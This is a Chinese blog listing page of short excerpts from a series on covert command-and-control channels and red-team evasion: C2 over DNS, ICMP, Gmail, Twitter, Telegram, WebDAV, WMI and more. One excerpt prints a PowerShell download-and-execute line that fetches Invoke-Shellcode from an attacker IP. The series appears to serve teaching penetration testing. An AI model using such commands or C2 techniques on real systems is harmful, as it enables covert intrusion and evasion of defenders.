• 等级
  • 806079 访问
  • 812 原创
  • 1191 转发
  • 1108 排名
  • 179 评论
  • 547 获赞

【基础篇】————21、隐匿攻击之JavaScript

有一些命令和控制工具可以使用各种fof方法来隐藏恶意流量或以各种格式执行植入。CaseySmith最初开发了一个原型工具,它使用JavaScript作为有效载荷,并连接回监听Web服务器。一位安全研究人员3gstudent扩展了CaseySmith的工作,并在PowerShell中开发了JSRat,它提供了一些额外的功能。此工具的其他变体存在于Python中,因此主控主机可以是Linux机器或...

2019-05-26 19:49:50

【基础篇】————21、隐匿攻击之Web Interface

红队评估的高要求使得安全公司和安全顾问对有不同功能的命令和控制工具的开发工具产生了极大的兴趣。其中一些工具可用于官方活动,而其他一些工具仅用于研究目的。Ares是一个用Python编写的命令和控制工具,由KevinLocati开发。它有一个在8080端口上运行的Web界面,它受密码和密码保护。必须在运行服务器之前创建数据库。./ares.pyinitdb./ares.pyruns...

2019-05-26 19:39:54

【基础篇】————20、隐匿攻击之Images

迈克尔·斯科特开发了一个python脚本,可以生成一个图标图像,并将PowerShell命令嵌入到该图像中。第一步是将命令写入文本文件。echo'IEX((new-objectnet.webclient).downloadstring("http://192.168.1.171/tmp/Invoke-Shellcode.ps1"));Invoke-Shellcode-payload...

2019-05-26 19:31:01

【基础篇】————19、隐匿攻击之WebSocket

在探索可以在红队参与期间使用的日常新方法和工具中特别关注命令和控制通道,这些通道可以逃避安全产品,并可以通过使用非传统方法隐藏流量。Arno0x0x发现某些Web网关不检查Web套接字内容。因此,它可以用作向主机执行任意命令的通信通道。Arno0x0x开发了一个实现此方法的命令和控制工具(WSC2)。该工具是用python编写的,可以用于数据泄露,因为它提供了文件传输功能和shell功能。...

2019-05-26 19:20:12

【基础篇】————18、隐匿攻击之WMI

WindowsManagementInstrumentation(WMI)是一项Microsoft技术,旨在允许管理员跨网络执行本地和远程管理操作。由于WMI是自Windows98以来存在的Windows生态系统的一部分,因此无论是运行Windows10还是WindowsXP,它几乎可以在每个网络中使用。可以通过WMI执行的一些操作是:命令执行 文件传输 读取文件和注册表项 文...

2019-05-26 19:07:50

【基础篇】————17、隐匿攻击之Website

通过合法流量覆盖任意命令是每个红队入侵的必要条件。大多数命令和控制工具正在实施一种秘密技术,它允许红队隐藏他们的活动,因为数据泄露是目标的一部分。DavidKennedy开发了一个名为TrevorC2的命令和控制工具,可用于通过合法的HTTP流量执行命令。需要将trevorc2_server.py上的URL属性修改为所选的网站。...

2019-05-26 18:57:42

【基础篇】————16、隐匿攻击之Kernel

现代环境实施不同级别的安全控制,如端点解决方案,主机入侵防御系统,防火墙和实时事件日志分析。另一方面,红队参与试图逃避这些控制,以避免被发现。但是,大多数工具会通过生成各种事件日志在网络级别或主机级别上产生某种噪声。RJMcdown和约书亚THEIMER已经发布了一个工具叫redsails中间DerbyCon2017年,其宗旨是让红队无需创建任何事件日志或建立新连接执行目标主机上的命令。这...

2019-05-26 18:50:58

【基础篇】————15、隐匿攻击之Https

C2工具通常依赖于各种协议作为通信机制,如DNS,ICMP,HTTPS等。大多数端点产品执行一些深度数据包检查,以便丢弃任意连接。使用支持加密的协议并使用证书固定生成的流量可以规避大部分产品,并且应该将其视为红队参与过程中的一种方法。ThunderShell由MrUn1k0d3r开发,基于Python。它使用Redis服务器在植入物和服务器之间进行HTTPS通信,并使用PowerShell在目...

2019-05-26 18:39:08

【基础篇】————14、隐匿攻击之Office 365

前言在定制化、创新化命令与控制(C2,CommandandControl)通道方面,人们已经做了许多研究工作,然而已公开的研究成果通常只是独立的理论概念,没有集成到现有的攻击工具包中。CobaltStrike最近添加了一个新的扩展功能,可以在保持工具兼容性的前提下,创造隐蔽的C2通道。CobaltStrike新添加的扩展名为“ExternalC2”,为了最大化挖掘该扩展的潜能,MW...

2019-05-26 18:30:10

【基础篇】————13、隐匿攻击之WebDAV

WebDAV是用于Web内容创作操作的HTTP协议的扩展。该协议的一些优点可以在红色团队中使用,因为它是代理感知和隐秘的,因为连接到WebDAV服务器的请求看起来像是通过SvCHOST进程从操作系统本身来的。PROPFIND方法用于检索存储在WebDAV服务器中的资源的属性。这些属性可以包括文件名,内容长度,创建和修改日期等。Arno0x0x发现可以通过PROPFIND响应传递有效负载,方...

2019-05-26 18:30:01

【基础篇】————12、隐匿攻击之Windows COM

红队之间的合作越来越受欢迎,系统管理员也越来越了解工具和技术,因此避免检测是一项艰巨的任务。另一方面,红队一直在寻找使用合法流量或Windows标准功能来隐藏其活动的命令和控制工具。本机Windows脚本宿主引擎可用作另一种命令和控制方法,在2017年拉斯维加斯Bsides展出,并发布了一个工具来协助此活动。KoadicFramework由SeanDillon和ZachHarding...

2019-05-26 18:29:53

【基础篇】————11、隐匿攻击之PowerShell

许多工具都是用PowerShell编写的,特别是对于红队团队的活动,因为大多数现代Windows都有PowerShell,而且管理员通常不会限制普通用户访问PowerShell控制台。这给攻击者带来了很大的好处,特别是如果蓝色团队不监视PowerShell使用情况。来自NettitudeLabs和DaveHardy的BenTurner创建了一个基于PowerShell和C#的命令和控制工...

2019-05-26 18:29:45

【基础篇】————10、隐匿攻击之Website Keyword

有各种命令和控制选项,其中一些使用ICMP和DNS等协议以及其他一些合法网站,如DropBox和Gmail。在DerbyCon3.0期间,MattGraeber和ChrisCampbell介绍了一种使用网站关键字的技术,以便在系统中触发shellcode的发布。MattNelson制作了一个PowerShell脚本,该脚本使用相同的技术来获得Meterpreter会话并使用其作为...

2019-05-26 18:29:38

【基础篇】————9、隐匿攻击之Twitter

社交媒体网络是公司营销团队的一个很好的工具。如果使用得当,他们往往会吸引新的业务。因此,几乎不可能将流量阻塞到Twitter和Facebook等社交媒体平台。它可以用于测试的优点是因为有各种命令和控制工具可以隐藏他们在社交媒体网络流量背后的活动。使用Twitter的一个公知的命令和控制工具叫做Twittor。这个工具是由PaulAmar开发的,它基于Gcat的概念,它使用Gmail作为命令和...

2019-05-26 18:29:32

【基础篇】————8、隐匿攻击之Telegram

0x00前言在Github上,涉及到将社交网络作为C2server(可理解为命令控制服务器)的poc项目越来越多,如利用gmail的gcat、gdog,利用twitter的twittor、以及利用Telegram的BlazeTelegramBackdoorToolkit(bt2),使用这类方法的好处不仅仅是因为社交网络的服务器稳定,更多的原因在于其通信可以隐藏在正常流量中,不易被发...

2019-05-26 18:29:24

【基础篇】————7、隐匿攻击之Gmail

Gmail为用户和企业提供电子邮件功能。这意味着允许大多数组织中的Gmail服务器流量。来自另一方的红队操作需要尽可能隐蔽,因此使用ICMP和SMTP等合法协议来执行命令到受感染的主机是必不可少的。为此,WebGcat和Gdog上有两个重要的工具,它们都可以使用Gmail作为命令和控制服务器。GcatGcat是基于python的框架,它使用Gmail来执行命令和控制服务器。Gcat中包...

2019-05-26 18:29:16

【基础篇】————6、隐匿攻击之DropBox

许多公司使用DropBox作为共享工具和托管数据。因此,对DropBox服务器的流量被限制或归类为恶意域是不常见的。但是,有可能滥用DropBox的功能并将其用作命令和控制工具。这可以通过DropBoxC2工具实现,该工具使用DropBoxAPI在控制器和植入物之间进行通信,因为它完全在内存中运行并且流量被加密,所以它是隐秘的。DropboxC2控制器的安装简单快捷。gitclo...

2019-05-26 18:29:09

【基础篇】————5、隐匿攻击之DNS

隐匿攻击之DNS即使在最受限制的环境中,也应该允许DNS流量解析内部或外部域。这可以用作目标主机和命令和控制服务器之间的通信通道。命令和数据包含在DNS查询和响应中,因此很难检测,因为任意命令隐藏在合法流量中。使用Dnscat2可以实现这种技术,Dnscat2可以通过DNS协议创建命令和控制通道。此工具使用基于C的客户端(植入),它需要在目标上执行,以便服务器接收连接。流量以加密形式传输,...

2019-05-26 18:28:53

【基础篇】————4、隐匿攻击之ICMP

隐匿攻击之ICMP内部网络中的大多数系统都位于防火墙和公司代理之后,以便控制入站和出站Internet流量。防火墙可以阻止反向并绑定TCP连接。但是大多数情况下允许ICMP流量。因此,可以将此协议用作隐蔽通道,以便获取shell并在目标主机上远程执行命令。这是一种古老的技术,在有限的环境中大多数时候都使用它来接收shell,但现在随着红队交战的蔓延,它可以作为另一种方法,通过使用ICMP流...

2019-05-26 18:28:11

【基础篇】————3、进入内网

要想进行内网渗透,我们的前提是要获取内网的访问权限,那么如何获取内网的访问权限呢?基于企业弱账号漏洞VPN(通过邮箱,密码爆破,社工等途径获取VPN) 企业相关运维系统(zabbix等)基于系统漏洞进入Metasploit(漏洞利用框架) 漏洞利用脚本网站应用程序渗透SQL注入 跨站脚本(XSS) 跨站请求伪造(CSRF) SSRF 功能/业务逻辑漏洞 其他漏洞等...

2019-05-26 18:27:32

博客专家

FLy_鹏程万里

业精于勤荒于嬉,行成于思毁于随!
关注
  • 互联网·电子商务/渗透测试工程师
  • 中国 四川省 成都市
奖章
  • Github
  • 专栏达人
  • 持之以恒
  • 1024勋章
  • 勤写标兵Lv1
  • 勤写标兵Lv2
  • 勤写标兵Lv3
  • 勤写标兵Lv4